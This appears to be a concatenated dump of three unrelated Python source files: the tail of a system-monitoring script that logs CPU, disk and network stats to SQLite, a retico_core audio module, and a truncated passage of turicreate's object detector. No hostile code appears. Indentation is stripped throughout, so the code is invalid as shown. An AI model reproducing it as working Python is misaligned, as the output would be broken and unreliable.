dsk_0b_rmb = (dsk2_0b[2] - dsk1_0b[2]) / 1024 / 1024
dsk_0b_wmb = (dsk2_0b[3] - dsk1_0b[3]) / 1024 / 1024
dsk_0b_rtm = (dsk2_0b[4] - dsk1_0b[4])
dsk_0b_wtm = (dsk2_0b[5] - dsk1_0b[5])
dsk_0c_rop = (dsk2_0c[0] - dsk1_0c[0])
dsk_0c_wop = (dsk2_0c[1] - dsk1_0c[1])
dsk_0c_rmb = (dsk2_0c[2] - dsk1_0c[2]) / 1024 / 1024
dsk_0c_wmb = (dsk2_0c[3] - dsk1_0c[3]) / 1024 / 1024
dsk_0c_rtm = (dsk2_0c[4] - dsk1_0c[4])
dsk_0c_wtm = (dsk2_0c[5] - dsk1_0c[5])
net2_all = net2["net1"]
net_smb = (net2_all[0] - net1_all[0]) / 1024 / 1024 / 2
net_rmb = (net2_all[1] - net1_all[1]) / 1024 / 1024 / 2
ses_c = subprocess.Popen(['/opt/sys_monitor/conf/chk_db1_apps-ses.sh', db1_host], stdout=subprocess.PIPE, shell=False, stderr=subprocess.PIPE)
stdout = ses_c.communicate()[0]
db1_ses = filter(type(stdout).isdigit, stdout)
rowid = 1
conn = sqlite3.connect('/opt/sys_monitor/db/monitor.db')
cursor = conn.cursor()
t = [rowid, date_time, cpu_usr, cpu_sys, cpu_tot,
mem_usd, mem_tot, swp_usd, swp_tot,
dsk_0b_rop, dsk_0b_wop, dsk_0b_rmb, dsk_0b_wmb, dsk_0b_rtm, dsk_0b_wtm,
dsk_0c_rop, dsk_0c_wop, dsk_0c_rmb, dsk_0c_wmb, dsk_0c_rtm, dsk_0c_wtm,
net_smb, net_rmb, db1_ses
]
conn.execute('INSERT OR REPLACE INTO monitor values (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)', t)
#print t
conn.commit()
def chkDb():
while True:
qryTime()
def chkStats():
while True:
statTime()
if __name__=='__main__':
p1 = Process(target = chkDb)
p1.start()
p2 = Process(target = chkStats)
p2.start()
|
audio.py
|
"""
Audio Module
============
This module defines basic incremental units and incremental modules to handle
audio input (via a standard microphone) and output.
"""
import threading
import queue
import time
import wave
try:
import pyaudio
except ImportError:
pass
from retico_core import *
CHANNELS = 1
"""Number of channels. For now, this is hard coded MONO. If there is interest to do
stereo or audio with even more channels, it has to be integrated into the modules."""
TIMEOUT = 0.01
"""Timeout in seconds used for the StreamingSpeakerModule."""
class AudioIU(IncrementalUnit):
"""An audio incremental unit that receives raw audio data from a source.
The audio contained should be monaural.
Attributes:
creator (AbstractModule): The module that created this IU
previous_iu (IncrementalUnit): A link to the IU created before the
current one.
grounded_in (IncrementalUnit): A link to the IU this IU is based on.
created_at (float): The UNIX timestamp of the moment the IU is created.
raw_audio (bytes[]): The raw audio of this IU
rate (int): The frame rate of this IU
nframes (int): The number of frames of this IU
sample_width (int): The bytes per sample of this IU
"""
@staticmethod
def type():
return "Audio IU"
def __init__(
self,
creator=None,
iuid=0,
previous_iu=None,
grounded_in=None,
rate=None,
nframes=None,
sample_width=None,
raw_audio=None,
**kwargs
):
super().__init__(
creator=creator,
iuid=iuid,
previous_iu=previous_iu,
grounded_in=grounded_in,
payload=raw_audio,
)
self.raw_audio = raw_audio
self.rate = rate
self.nframes = nframes
self.sample_width = sample_width
def set_audio(self, raw_audio, nframes, rate, sample_width):
"""Sets the audio content of the IU."""
self.raw_audio = raw_audio
self.payload = raw_audio
self.nframes = int(nframes)
self.rate = int(rate)
self.sample_width = int(sample_width)
def audio_length(self):
"""Return the length of the audio IU in seconds.
Returns:
float: Length of the audio in this IU in seconds.
"""
return float(self.nframes) / float(self.rate)
class SpeechIU(AudioIU):
"""A type of audio incremental unit that contains a larger amount of audio
    information and a flag indicating whether the audio should be dispatched or not.
This IU can be processed by an AudioDispatcherModule which converts this
type of IU to AudioIU.
"""
@staticmethod
def type():
return "Speech IU"
def __init__(self, **kwargs):
super().__init__(**kwargs)
        self.dispatch = False
class DispatchedAudioIU(AudioIU):
"""A type of audio incremental unit that is dispatched by an
    AudioDispatcherModule. It carries the completion percentage of the
    dispatched audio. This may be useful for a dialog manager that
wants to track the status of the current dispatched audio.
"""
@staticmethod
def type():
return "Dispatched Audio IU"
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.completion = 0.0
self.is_dispatching = False
def set_dispatching(self, completion, is_dispatching):
"""Set the completion percentage and the is_dispatching flag.
Args:
completion (float): The degree of completion of the current
utterance.
is_dispatching (bool): Whether or not the dispatcher is currently
dispatching
"""
self.completion = completion
self.is_dispatching = is_dispatching
class MicrophoneModule(AbstractProducingModule):
"""A module that produces IUs containing audio signals that are captures by
a microphone."""
@staticmethod
def name():
return "Microphone Module"
@staticmethod
def description():
return "A prodicing module that records audio from microphone."
@staticmethod
def output_iu():
return AudioIU
def callback(self, in_data, frame_count, time_info, status):
"""The callback function that gets called by pyaudio.
Args:
in_data (bytes[]): The raw audio that is coming in from the
microphone
frame_count (int): The number of frames that are stored in in_data
"""
self.audio_buffer.put(in_data)
return (in_data, pyaudio.paContinue)
def __init__(self, chunk_size, rate=44100, sample_width=2, **kwargs):
"""
Initialize the Microphone Module.
Args:
chunk_size (int): The number of frames that should be stored in one
AudioIU
rate (int): The frame rate of the recording
sample_width (int): The width of a single sample of audio in bytes.
"""
super().__init__(**kwargs)
self.chunk_size = chunk_size
self.rate = rate
self.sample_width = sample_width
self._p = pyaudio.PyAudio()
self.audio_buffer = queue.Queue()
self.stream = None
def process_update(self, update_message):
if not self.audio_buffer:
return None
sample = self.audio_buffer.get()
output_iu = self.create_iu()
output_iu.set_audio(sample, self.chunk_size, self.rate, self.sample_width)
return UpdateMessage.from_iu(output_iu, UpdateType.ADD)
def setup(self):
"""Set up the microphone for recording."""
p = self._p
self.stream = p.open(
format=p.get_format_from_width(self.sample_width),
channels=CHANNELS,
rate=self.rate,
input=True,
output=False,
stream_callback=self.callback,
frames_per_buffer=self.chunk_size,
start=False,
)
def prepare_run(self):
if self.stream:
self.stream.start_stream()
def shutdown(self):
"""Close the audio stream."""
self.stream.stop_stream()
self.stream.close()
self.stream = None
self.audio_buffer = queue.Queue()
class SpeakerModule(AbstractConsumingModule):
"""A module that consumes AudioIUs of arbitrary size and outputs them to the
speakers of the machine. When a new IU is incoming, the module blocks as
long as the current IU is being played."""
@staticmethod
def name():
return "Speaker Module"
@staticmethod
def description():
return "A consuming module that plays audio from speakers."
@staticmethod
def input_ius():
return [AudioIU]
@staticmethod
def output_iu():
return None
def __init__(self, rate=44100, sample_width=2, use_speaker="both", **kwargs):
super().__init__(**kwargs)
self.rate = rate
self.sample_width = sample_width
self.use_speaker = use_speaker
self._p = pyaudio.PyAudio()
self.stream = None
self.time = None
def process_update(self, update_message):
for iu, ut in update_message:
if ut == UpdateType.ADD:
self.stream.write(bytes(iu.raw_audio))
return None
def setup(self):
"""Set up the speaker for outputting audio"""
p = self._p
# MacOS-only code...
# TODO: Figure out if this crashes on Linux and Windows
if self.use_speaker == "left":
stream_info = pyaudio.PaMacCoreStreamInfo(channel_map=(0, -1))
elif self.use_speaker == "right":
stream_info = pyaudio.PaMacCoreStreamInfo(channel_map=(-1, 0))
else:
stream_info = pyaudio.PaMacCoreStreamInfo(channel_map=(0, 0))
self.stream = p.open(
format=p.get_format_from_width(self.sample_width),
channels=CHANNELS,
rate=self.rate,
input=False,
output_host_api_specific_stream_info=stream_info,
output=True,
)
def shutdown(self):
"""Close the audio stream."""
self.stream.stop_stream()
self.stream.close()
self.stream = None
class StreamingSpeakerModule(AbstractConsumingModule):
"""A module that consumes Audio IUs and outputs them to the speaker of the
machine. The audio output is streamed and thus the Audio IUs have to have
exactly [chunk_size] samples."""
@staticmethod
def name():
return "Streaming Speaker Module"
@staticmethod
def description():
return "A consuming module that plays audio from speakers."
@staticmethod
def input_ius():
return [AudioIU]
@staticmethod
def output_iu():
return None
def callback(self, in_data, frame_count, time_info, status):
"""The callback function that gets called by pyaudio."""
if self.audio_buffer:
try:
                audio_packet = self.audio_buffer.get(timeout=TIMEOUT)
                return (audio_packet, pyaudio.paContinue)
except queue.Empty:
pass
return (b"\0" * frame_count * self.sample_width, pyaudio.paContinue)
def __init__(self, chunk_size, rate=44100, sample_width=2, **kwargs):
"""Initialize the streaming speaker module.
Args:
chunk_size (int): The number of frames a buffer of the output stream
should have.
rate (int): The frame rate of the audio. Defaults to 44100.
sample_width (int): The sample width of the audio. Defaults to 2.
"""
super().__init__(**kwargs)
self.chunk_size = chunk_size
self.rate = rate
self.sample_width = sample_width
self._p = pyaudio.PyAudio()
self.audio_buffer = queue.Queue()
self.stream = None
def process_update(self, update_message):
for iu, ut in update_message:
if ut == UpdateType.ADD:
self.audio_buffer.put(iu.raw_audio)
return None
def setup(self):
"""Set up the speaker for speaking...?"""
p = self._p
self.stream = p.open(
format=p.get_format_from_width(self.sample_width),
channels=CHANNELS,
rate=self.rate,
input=False,
output=True,
stream_callback=self.callback,
frames_per_buffer=self.chunk_size,
)
def prepare_run(self):
self.stream.start_stream()
def shutdown(self):
"""Close the audio stream."""
self.stream.stop_stream()
self.stream.close()
self.stream = None
self.audio_buffer = queue.Queue()
class AudioDispatcherModule(AbstractModule):
"""An Audio module that takes a raw audio stream of arbitrary size and
outputs AudioIUs with a specific chunk size at the rate it would be produced
if the audio was being played.
    This could be especially useful when an agent's TTS module produces an
utterance, but this utterance should not be transmitted as a whole but in
an incremental way.
Attributes:
target_chunk_size (int): The size of each output IU in samples.
silence (bytes): A bytes array containing [target_chunk_size] samples
of silence that is dispatched when [continuous] is True and no input
IU is dispatched.
continuous (bool): Whether or not the dispatching should be continuous.
            If True, AudioIUs with "silence" will be dispatched if no input IUs
are being dispatched. If False, no IUs will be produced during
silence.
        rate (int): The sample rate of the output and the input IU.
        sample_width (int): The sample width of the output and input IU.
speed (float): The speed of the dispatching. 1.0 means realtime.
        dispatching_mutex (threading.Lock): The mutex guarding the flag that
            indicates whether an input IU is currently being dispatched.
audio_buffer (list): The current audio buffer containing the output IUs
that are currently dispatched.
run_loop (bool): Whether or not the dispatching loop is running.
interrupt (bool): Whether or not incoming IUs interrupt the old
dispatching
"""
@staticmethod
def name():
return "Audio Dispatching Module"
@staticmethod
def description():
return (
"A module that transmits audio by splitting it up into" "streamable pakets."
)
@staticmethod
def input_ius():
return [SpeechIU]
@staticmethod
def output_iu():
return DispatchedAudioIU
def __init__(
self,
target_chunk_size,
rate=44100,
sample_width=2,
speed=1.0,
continuous=True,
silence=None,
interrupt=True,
**kwargs
):
"""Initialize the AudioDispatcherModule with the given arguments.
Args:
target_chunk_size (int): The size of each output IU in samples.
            rate (int): The sample rate of the output and the input IU.
            sample_width (int): The sample width of the output and input IU.
speed (float): The speed of the dispatching. 1.0 means realtime.
continuous (bool): Whether or not the dispatching should be
continuous. If True, AudioIUs with "silence" will be dispatched
if no input IUs are being dispatched. If False, no IUs will be
produced during silence.
silence (bytes): A bytes array containing target_chunk_size samples
of silence. If this argument is set to None, a default silence
of all zeros will be set.
interrupt (boolean): If this flag is set, a new input IU with audio
to dispatch will stop the current dispatching process. If set to
False, the "old" dispatching will be finished before the new one
is started. If the new input IU has the dispatching flag set to
False, dispatching will always be stopped.
"""
super().__init__(**kwargs)
self.target_chunk_size = target_chunk_size
if not silence:
self.silence = b"\0" * target_chunk_size * sample_width
else:
self.silence = silence
self.continuous = continuous
self.rate = rate
self.sample_width = sample_width
self._is_dispatching = False
self.dispatching_mutex = threading.Lock()
self.audio_buffer = []
self.run_loop = False
self.speed = speed
self.interrupt = interrupt
def is_dispatching(self):
"""Return whether or not the audio dispatcher is dispatching a Speech
IU.
Returns:
bool: Whether or not speech is currently dispatched
"""
with self.dispatching_mutex:
return self._is_dispatching
def set_dispatching(self, value):
"""Set the dispatching value of this module in a thread safe way.
Args:
value (bool): The new value of the dispatching flag.
"""
with self.dispatching_mutex:
self._is_dispatching = value
def process_update(self, update_message):
cur_width = self.target_chunk_size * self.sample_width
        # If the AudioDispatcherModule is set to interrupt mode or if the
# incoming IU is set to not dispatch, we stop dispatching and clean the
# buffer
for iu, ut in update_message:
if ut != UpdateType.ADD:
continue
if self.interrupt or not iu.dispatch:
self.set_dispatching(False)
self.audio_buffer = []
if iu.dispatch:
# Loop over all frames (frame-sized chunks of data) in the input IU
# and add them to the buffer to be dispatched by the
# _dispatch_audio_loop
for i in range(0, iu.nframes, self.target_chunk_size):
cur_pos = i * self.sample_width
data = iu.raw_audio[cur_pos : cur_pos + cur_width]
distance = cur_width - len(data)
data += b"\0" * distance
completion = float((i + self.target_chunk_size) / iu.nframes)
if completion > 1:
completion = 1
current_iu = self.create_iu(iu)
current_iu.set_dispatching(completion, True)
current_iu.set_audio(
data, self.target_chunk_size, self.rate, self.sample_width
)
self.audio_buffer.append(current_iu)
self.set_dispatching(True)
return None
def _dispatch_audio_loop(self):
"""A method run in a thread that adds IU to the output queue."""
while self.run_loop:
with self.dispatching_mutex:
if self._is_dispatching:
if self.audio_buffer:
self.append(
UpdateMessage.from_iu(
self.audio_buffer.pop(0), UpdateType.ADD
)
)
else:
self._is_dispatching = False
                if not self._is_dispatching:  # no "else" here: the flag may have just been cleared above
if self.continuous:
current_iu = self.create_iu(None)
current_iu.set_audio(
self.silence,
self.target_chunk_size,
self.rate,
self.sample_width,
)
current_iu.set_dispatching(0.0, False)
self.append(UpdateMessage.from_iu(current_iu, UpdateType.ADD))
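            # Pacing example (illustrative values): 4410-sample chunks at a
            # rate of 44100 Hz and speed 1.0 make the sleep below emit roughly
            # one IU every 0.1 seconds.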
time.sleep((self.target_chunk_size / self.rate) / self.speed)
def prepare_run(self):
self.run_loop = True
t = threading.Thread(target=self._dispatch_audio_loop)
t.start()
def shutdown(self):
self.run_loop = False
self.audio_buffer = []
class AudioRecorderModule(AbstractConsumingModule):
"""A Module that consumes AudioIUs and saves them as a PCM wave file to
disk."""
@staticmethod
def name():
return "Audio Recorder Module"
@staticmethod
def description():
return "A Module that saves incoming audio to disk."
@staticmethod
def input_ius():
return [AudioIU]
def __init__(self, filename, rate=44100, sample_width=2, **kwargs):
"""Initialize the audio recorder module.
Args:
filename (string): The file name where the audio should be recorded
to. The path to the file has to be created beforehand.
rate (int): The sample rate of the input and thus of the wave file.
Defaults to 44100.
sample_width (int): The width of one sample. Defaults to 2.
"""
super().__init__(**kwargs)
self.filename = filename
self.wavfile = None
self.rate = rate
self.sample_width = sample_width
def process_update(self, update_message):
for iu, ut in update_message:
if ut == UpdateType.ADD:
self.wavfile.writeframes(iu.raw_audio)
def setup(self):
self.wavfile = wave.open(self.filename, "wb")
self.wavfile.setframerate(self.rate)
self.wavfile.setnchannels(CHANNELS)
self.wavfile.setsampwidth(self.sample_width)
def shutdown(self):
self.wavfile.close()
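# Usage sketch (not part of the original module): split a mono PCM wave file
# into AudioIU chunks using only the classes above and the standard-library
# wave module. The helper name and chunk size are illustrative, and the sketch
# assumes the base IncrementalUnit accepts the default constructor arguments
# that AudioIU passes through.
def _example_wave_to_ius(path, chunk_size=4096):
    ius = []
    wf = wave.open(path, "rb")
    try:
        rate = wf.getframerate()
        sample_width = wf.getsampwidth()
        data = wf.readframes(chunk_size)
        while data:
            iu = AudioIU()
            # The last chunk may be shorter, so derive nframes from the data length.
            iu.set_audio(data, len(data) // sample_width, rate, sample_width)
            ius.append(iu)
            data = wf.readframes(chunk_size)
    finally:
        wf.close()
    return ius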
|
object_detector.py
|
# -*- coding: utf-8 -*-
# Copyright © 2017 Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can
# be found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
"""
Class definition and utilities for the object detection toolkit.
"""
from __future__ import print_function as _
from __future__ import division as _
from __future__ import absolute_import as _
import time as _time
import itertools as _itertools
from datetime import datetime as _datetime
import six as _six
import turicreate as _tc
import numpy as _np
from threading import Thread as _Thread
from six.moves.queue import Queue as _Queue
from turicreate.toolkits._model import CustomModel as _CustomModel
import turicreate.toolkits._internal_utils as _tkutl
from turicreate.toolkits import _coreml_utils
from turicreate.toolkits._model import PythonProxy as _PythonProxy
from turicreate.toolkits._internal_utils import (_raise_error_if_not_sframe,
_numeric_param_check_range)
from turicreate import config as _tc_config
from .. import _mxnet_utils
from turicreate.toolkits._main import ToolkitError as _ToolkitError
from .. import _pre_trained_models
from ._evaluation import average_precision as _average_precision
from .._mps_utils import (use_mps as _use_mps,
mps_device_name as _mps_device_name,
MpsGraphAPI as _MpsGraphAPI,
MpsGraphNetworkType as _MpsGraphNetworkType,
MpsGraphMode as _MpsGraphMode,
mps_to_mxnet as _mps_to_mxnet,
mxnet_to_mps as _mxnet_to_mps,
mxnet_network_to_mps_params as _mxnet_network_to_mps_params)
_MXNET_MODEL_FILENAME = "mxnet_model.params"
def _get_mps_od_net(input_image_shape, batch_size, output_size, anchors,
config, weights={}):
"""
Initializes an MpsGraphAPI for object detection.
"""
network = _MpsGraphAPI(network_id=_MpsGraphNetworkType.kODGraphNet)
c_in, h_in, w_in = input_image_shape
c_out = output_size
h_out = h_in // 32
w_out = w_in // 32
c_view = c_in
h_view = h_in
w_view = w_in
network.init(batch_size, c_in, h_in, w_in, c_out, h_out, w_out,
weights=weights, config=config)
return network
# Standard lib functions would be great here, but the formatting options of
# timedelta are not great
def _seconds_as_string(seconds):
"""
Returns seconds as a human-friendly string, e.g. '1d 4h 47m 41s'
"""
TIME_UNITS = [('s', 60), ('m', 60), ('h', 24), ('d', None)]
unit_strings = []
cur = max(int(seconds), 1)
for suffix, size in TIME_UNITS:
if size is not None:
cur, rest = divmod(cur, size)
else:
rest = cur
if rest > 0:
unit_strings.insert(0, '%d%s' % (rest, suffix))
return ' '.join(unit_strings)
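# Worked example: _seconds_as_string(90061) walks the units as 90061 s ->
# 1501 m + 1 s -> 25 h + 1 m -> 1 d + 1 h, producing '1d 1h 1m 1s'.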
def _raise_error_if_not_detection_sframe(dataset, feature, annotations, require_annotations):
    _raise_error_if_not_sframe(dataset, 'dataset')
if feature not in dataset.column_names():
raise _ToolkitError("Feature column '%s' does not exist" % feature)
if dataset[feature].dtype != _tc.Image:
raise _ToolkitError("Feature column must contain images")
if require_annotations:
if annotations not in dataset.column_names():
raise _ToolkitError("Annotations column '%s' does not exist" % annotations)
if dataset[annotations].dtype not in [list, dict]:
raise _ToolkitError("Annotations column must be of type dict or list")
def create(dataset, annotations=None, feature=None, model='darknet-yolo',
classes=None, max_iterations=0, verbose=True, **kwargs):
"""
Create a :class:`ObjectDetector` model.
Parameters
----------
dataset : SFrame
Input data. The columns named by the ``feature`` and ``annotations``
parameters will be extracted for training the detector.
annotations : string
Name of the column containing the object detection annotations. This
column should be a list of dictionaries (or a single dictionary), with
each dictionary representing a bounding box of an object instance. Here
is an example of the annotations for a single image with two object
instances::
[{'label': 'dog',
'type': 'rectangle',
'coordinates': {'x': 223, 'y': 198,
'width': 130, 'height': 230}},
{'label': 'cat',
'type': 'rectangle',
'coordinates': {'x': 40, 'y': 73,
'width': 80, 'height': 123}}]
The value for `x` is the horizontal center of the box paired with
`width` and `y` is the vertical center of the box paired with `height`.
'None' (the default) indicates the only list column in `dataset` should
be used for the annotations.
feature : string
Name of the column containing the input images. 'None' (the default)
indicates the only image column in `dataset` should be used as the
feature.
    model : string, optional
Object detection model to use:
- "darknet-yolo" : Fast and medium-sized model
    classes : list, optional
List of strings containing the names of the classes of objects.
Inferred from the data if not provided.
max_iterations : int
        The number of training iterations. If 0, it will be determined
        automatically based on the amount of data you provide.
verbose : bool, optional
If True, print progress updates and model details.
Returns
-------
out : ObjectDetector
A trained :class:`ObjectDetector` model.
See Also
--------
ObjectDetector
Examples
--------
.. sourcecode:: python
# Train an object detector model
>>> model = turicreate.object_detector.create(data)
        # Make predictions on the training set and add them as a column to the SFrame
>>> data['predictions'] = model.predict(data)
# Visualize predictions by generating a new column of marked up images
>>> data['image_pred'] = turicreate.object_detector.util.draw_bounding_boxes(data['image'], data['predictions'])
"""
_raise_error_if_not_sframe(dataset, "dataset")
from ._mx_detector import YOLOLoss as _YOLOLoss
from ._model import tiny_darknet as _tiny_darknet
from ._sframe_loader import SFrameDetectionIter as _SFrameDetectionIter
from ._manual_scheduler import ManualScheduler as _ManualScheduler
import mxnet as _mx
if len(dataset) == 0:
raise _ToolkitError('Unable to train on empty dataset')
_numeric_param_check_range('max_iterations', max_iterations, 0, _six.MAXSIZE)
start_time = _time.time()
supported_detectors = ['darknet-yolo']
if feature is None:
feature = _tkutl._find_only_image_column(dataset)
if verbose:
print("Using '%s' as feature column" % feature)
if annotations is None:
annotations = _tkutl._find_only_column_of_type(dataset,
target_type=[list, dict],
type_name='list',
col_name='annotations')
if verbose:
print("Using '%s' as annotations column" % annotations)
_raise_error_if_not_detection_sframe(dataset, feature, annotations,
require_annotations=True)
is_annotations_list = dataset[annotations].dtype == list
_tkutl._check_categorical_option_type('model', model,
supported_detectors)
base_model = model.split('-', 1)[0]
ref_model = _pre_trained_models.OBJECT_DETECTION_BASE_MODELS[base_model]()
params = {
'anchors': [
(1.0, 2.0), (1.0, 1.0), (2.0, 1.0),
(2.0, 4.0), (2.0, 2.0), (4.0, 2.0),
(4.0, 8.0), (4.0, 4.0), (8.0, 4.0),
(8.0, 16.0), (8.0, 8.0), (16.0, 8.0),
(16.0, 32.0), (16.0, 16.0), (32.0, 16.0),
],
'grid_shape': [13, 13],
'batch_size': 32,
'aug_resize': 0,
'aug_rand_crop': 0.9,
'aug_rand_pad': 0.9,
'aug_rand_gray': 0.0,
'aug_aspect_ratio': 1.25,
'aug_hue': 0.05,
'aug_brightness': 0.05,
'aug_saturation': 0.05,
'aug_contrast': 0.05,
'aug_horizontal_flip': True,
'aug_min_object_covered': 0,
'aug_min_eject_coverage': 0.5,
'aug_area_range': (.15, 2),
'aug_pca_noise': 0.0,
'aug_max_attempts': 20,
'aug_inter_method': 2,
'lmb_coord_xy': 10.0,
'lmb_coord_wh': 10.0,
'lmb_obj': 100.0,
'lmb_noobj': 5.0,
'lmb_class': 2.0,
'non_maximum_suppression_threshold': 0.45,
'rescore': True,
'clip_gradients': 0.025,
'weight_decay': 0.0005,
'sgd_momentum': 0.9,
'learning_rate': 1.0e-3,
'shuffle': True,
'mps_loss_mult': 8,
# This large buffer size (8 batches) is an attempt to mitigate against
# the SFrame shuffle operation that can occur after each epoch.
'io_thread_buffer_size': 8,
}
if '_advanced_parameters' in kwargs:
# Make sure no additional parameters are provided
new_keys = set(kwargs['_advanced_parameters'].keys())
set_keys = set(params.keys())
unsupported = new_keys - set_keys
if unsupported:
raise _ToolkitError('Unknown advanced parameters: {}'.format(unsupported))
params.update(kwargs['_advanced_parameters'])
anchors = params['anchors']
num_anchors = len(anchors)
num_mxnet_gpus = _mxnet_utils.get_num_gpus_in_use(max_devices=params['batch_size'])
batch_size_each = params['batch_size'] // max(num_mxnet_gpus, 1)
# Note, this may slightly alter the batch size to fit evenly on the GPUs
batch_size = max(num_mxnet_gpus, 1) * batch_size_each
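    # Illustrative numbers: a requested batch_size of 32 on 3 GPUs becomes
    # 10 per device, i.e. an effective batch size of 30.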
use_mps = _use_mps() and num_mxnet_gpus == 0
# The IO thread also handles MXNet-powered data augmentation. This seems
    # to be problematic to run independently of an MXNet-powered neural network
# in a separate thread. For this reason, we restrict IO threads to when
# the neural network backend is MPS.
io_thread_buffer_size = params['io_thread_buffer_size'] if use_mps else 0
if verbose:
if use_mps:
print('Using GPU to create model ({})'.format(_mps_device_name()))
elif num_mxnet_gpus == 1:
print('Using GPU to create model (CUDA)')
elif num_mxnet_gpus > 1:
print('Using {} GPUs to create model (CUDA)'.format(num_mxnet_gpus))
else:
print('Using CPU to create model')
grid_shape = params['grid_shape']
input_image_shape = (3,
grid_shape[0] * ref_model.spatial_reduction,
grid_shape[1] * ref_model.spatial_reduction)
try:
if is_annotations_list:
instances = (dataset.stack(annotations, new_column_name='_bbox', drop_na=True)
.unpack('_bbox', limit=['label']))
else:
instances = dataset.rename({annotations: '_bbox'}).dropna('_bbox')
instances = instances.unpack('_bbox', limit=['label'])
except (TypeError, RuntimeError):
        # If this fails, the annotation format is invalid at the coarsest level
raise _ToolkitError("Annotations format is invalid. Must be a list of "
"dictionaries or single dictionary containing 'label' and 'coordinates'.")
num_images = len(dataset)
num_instances = len(instances)
if classes is None:
classes = instances['_bbox.label'].unique()
classes = sorted(classes)
# Make a class-to-index look-up table
class_to_index = {name: index for index, name in enumerate(classes)}
num_classes = len(classes)
if max_iterations == 0:
# Set number of iterations through a heuristic
num_iterations_raw = 5000 * _np.sqrt(num_instances) / batch_size
num_iterations = 1000 * max(1, int(round(num_iterations_raw / 1000)))
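        # Illustrative numbers: 4000 instances with batch_size 32 give
        # 5000*sqrt(4000)/32 ≈ 9882, which rounds to 10000 iterations.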
if verbose:
print("Setting 'max_iterations' to {}".format(num_iterations))
else:
num_iterations = max_iterations
# Create data loader
loader = _SFrameDetectionIter(dataset,
batch_size=batch_size,
input_shape=input_image_shape[1:],
output_shape=grid_shape,
anchors=anchors,
class_to_index=class_to_index,
aug_params=params,
shuffle=params['shuffle'],
loader_type='augmented',
feature_column=feature,
annotations_column=annotations,
io_thread_buffer_size=io_thread_buffer_size,
iterations=num_iterations)
# Predictions per anchor box: x/y + w/h + object confidence + class probs
preds_per_box = 5 + num_classes
output_size = preds_per_box * num_anchors
ymap_shape = (batch_size_each,) + tuple(grid_shape) + (num_anchors, preds_per_box)
net = _tiny_darknet(output_size=output_size)
loss = _YOLOLoss(input_shape=input_image_shape[1:],
output_shape=grid_shape,
batch_size=batch_size_each,
num_classes=num_classes,
anchors=anchors,
parameters=params)
base_lr = params['learning_rate']
steps = [num_iterations // 2, 3 * num_iterations // 4, num_iterations]
steps_and_factors = [(step, 10**(-i)) for i, step in enumerate(steps)]
steps, factors = zip(*steps_and_factors)
lr_scheduler = _ManualScheduler(step=steps, factor=factors)
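    # Illustrative pairing: with num_iterations = 10000 this yields steps
    # (5000, 7500, 10000) with factors (1, 0.1, 0.01), i.e. the learning rate
    # is cut by 10x halfway through and by another 10x at the three-quarter mark.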
ctx = _mxnet_utils.get_mxnet_context(max_devices=batch_size)
net_params = net.collect_params()
net_params.initialize(_mx.init.Xavier(), ctx=ctx)
net_params['conv7_weight'].initialize(_mx.init.Xavier(factor_type='avg'), ctx=ctx, force_reinit=True)
net_params['conv8_weight'].initialize(_mx.init.Uniform(0.00005), ctx=ctx, force_reinit=True)
# Initialize object confidence low, preventing an unnecessary adjustment
# period toward conservative estimates
bias = _np.zeros(output_size, dtype=_np.float32)
bias[4::preds_per_box] -= 6
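    # A logit of -6 corresponds to an initial objectness of roughly
    # sigmoid(-6) ≈ 0.0025, so boxes start out predicting "no object".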
from ._mx_detector import ConstantArray
net_params['conv8_bias'].initialize(ConstantArray(bias), ctx, force_reinit=True)
# Take a subset and then load the rest of the parameters. It is possible to
# do allow_missing=True directly on net_params. However, this will more
# easily hide bugs caused by names getting out of sync.
ref_model.available_parameters_subset(net_params).load(ref_model.model_path, ctx)
if verbose:
# Print progress table header
column_names = ['Iteration', 'Loss', 'Elapsed Time']
num_columns = len(column_names)
column_width = max(map(lambda x: len(x), column_names)) + 2
hr = '+' + '+'.join(['-' * column_width] * num_columns) + '+'
print(hr)
print(('| {:<{width}}' * num_columns + '|').format(*column_names, width=column_width-1))
print(hr)
progress = {'smoothed_loss': None, 'last_time': 0}
iteration = 0
def update_progress(cur_loss, iteration):
iteration_base1 = iteration + 1
if progress['smoothed_loss'] is None:
progress['smoothed_loss'] = cur_loss
else:
progress['smoothed_loss'] = 0.9 * progress['smoothed_loss'] + 0.1 * cur_loss
cur_time = _time.time()
if verbose and (cur_time > progress['last_time'] + 10 or
iteration_base1 == max_iterations):
# Print progress table row
elapsed_time = cur_time - start_time
print("| {cur_iter:<{width}}| {loss:<{width}.3f}| {time:<{width}.1f}|".format(
cur_iter=iteration_base1, loss=progress['smoothed_loss'],
time=elapsed_time , width=column_width-1))
progress['last_time'] = cur_time
if use_mps:
net.forward(_mx.nd.uniform(0, 1, (batch_size_each,) + input_image_shape))
mps_net_params = {}
keys = list(net_params)
for k in keys:
mps_net_params[k] = _mxnet_to_mps(net_params[k].data().asnumpy())
# Multiplies the loss to move the fp16 gradients away from subnormals
# and gradual underflow. The learning rate is correspondingly divided
# by the same multiple to make training mathematically equivalent. The
# update is done in fp32, which is why this trick works. Does not
# affect how loss is presented to the user.
mps_loss_mult = params['mps_loss_mult']
mps_config = {
'mode': _MpsGraphMode.Train,
'use_sgd': True,
'learning_rate': base_lr / params['mps_loss_mult'],
'gradient_clipping': params.get('clip_gradients', 0.0) * mps_loss_mult,
'weight_decay': params['weight_decay'],
'od_include_network': True,
'od_include_loss': True,
'od_scale_xy': params['lmb_coord_xy'] * mps_loss_mult,
'od_scale_wh': params['lmb_coord_wh'] * mps_loss_mult,
'od_scale_no_object': params['lmb_noobj'] * mps_loss_mult,
'od_scale_object': params['lmb_obj'] * mps_loss_mult,
'od_scale_class': params['lmb_class'] * mps_loss_mult,
'od_max_iou_for_no_object': 0.3,
'od_min_iou_for_object': 0.7,
'od_rescore': params['rescore'],
}
mps_net = _get_mps_od_net(input_image_shape=input_image_shape,
batch_size=batch_size,
output_size=output_size,
anchors=anchors,
config=mps_config,
weights=mps_net_params)
# Use worker threads to isolate different points of synchronization
# and/or waiting for non-Python tasks to finish. The
# sframe_worker_thread will spend most of its time waiting for SFrame
# operations, largely image I/O and decoding, along with scheduling
# MXNet data augmentation. The numpy_worker_thread will spend most of
# its time waiting for MXNet data augmentation to complete, along with
# copying the results into NumPy arrays. Finally, the main thread will
# spend most of its time copying NumPy data into MPS and waiting for the
# results. Note that using three threads here only makes sense because
# each thread spends time waiting for non-Python code to finish (so that
